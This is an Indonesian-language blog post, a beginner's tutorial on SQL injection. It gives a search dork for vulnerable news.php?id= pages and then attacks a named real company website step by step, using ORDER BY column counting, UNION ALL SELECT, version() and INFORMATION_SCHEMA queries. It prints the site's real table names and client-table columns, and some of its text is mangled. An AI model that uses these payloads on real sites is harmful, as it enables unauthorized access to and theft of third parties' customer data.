.:: @lief's WeBlog ::.: injek siqil for dummies

undefined undefined

Dork:

news.php?id=

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1

berarti site ini Vuln, setelah terdapat error seperti di atas gunakan perintah ORDER BY untuk

panjang column, dan jangan lupa gunakan “--“ di belakang angka yang di masukan.

box clever ::: news ::: 2 New WRPS Websites Launched ::: intelligent digital media
tidak menampilkan eror, coba gunakan order by 6

http://www.boxclever.ca/news.php?id=...der%20by%206--
ternyata muncul error:
Unknown column '6' in 'order clause'

order by 6 site mengeluarkan error seperti Unknown column ‘6’ in 'order clause' berarti panjang column tidak sampai 6

box clever ::: news ::: 2 New WRPS Websites Launched ::: intelligent digital media
udah ga muncul error.

Tambahkan tanda “-” didepan angka 92 dan gunakan perintah UNION+ALL+SELECT+1,2,3,4,5--
box clever ::: news ::: 3 ::: intelligent digital media
muncul angka ini:

3
1
4

Ganti angka 3 atau 1 atau 4 dengan version(). Saya gantikan angka 3.
box clever ::: news ::: 5.0.51a-log ::: intelligent digital media
muncul:
5.0.51a-log
Berarti sql Version 5

setelah mengetahui versinya ganti perintah VERSION() dengan GROUP_CONCAT(TABLE_NAME) serta berikan perintah FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_SCHEMA= DATABASE()-- di belakang column, perintah tersebut untuk mengetahui nama nama table pada database;)
box clever ::: news ::: client_info,contact,customersurvey,featured_projec t,news,project,project_level,project_status,projec t_type,provinces,rfp,uploads ::: intelligent digital media
muncul:

client_info,contact,customersurvey,featured_projec t,news,project,project_level,project_status,projec t_type,provinces,rfp,uploads

client_id,client_name,client_street,client_city,cl ient_province,client_pc,client_notes